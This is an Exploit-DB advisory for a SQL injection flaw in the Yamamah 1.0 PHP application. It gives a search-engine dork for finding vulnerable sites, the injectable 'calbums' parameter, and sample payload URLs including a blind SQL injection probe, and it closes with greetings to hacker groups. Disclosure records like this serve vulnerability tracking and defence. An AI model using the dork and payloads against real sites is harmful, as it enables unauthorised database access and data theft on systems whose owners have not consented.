Yamamah 1.0 - SQL Injection

EDB-ID:

13849




Platform:

PHP

Date:

2010-06-12


# Exploit Title: Yamamah 1.0 SQL Injection Vulnerability
# Date: 12/06/2010
# Author: TheMaStEr <v4m@hotmail.de>
# Software Link: http://www.yamamah.org/
# Version: 1.00
# Tested on: Windows SP3
# Dork: intext:"Powered By : Yamamah Version 1.00"
# Code : http://localhost/y/index.php?calbums=1'
demo :
http://target/path/?calbums=1+and+1=1-- <Blind SQLi>
GreeTz : SA H4x0r (Abu Saud) , Dr-PHP , r3no , Hard_Hakerz , Ma3sTr0-Dz & All v4-Team Members

#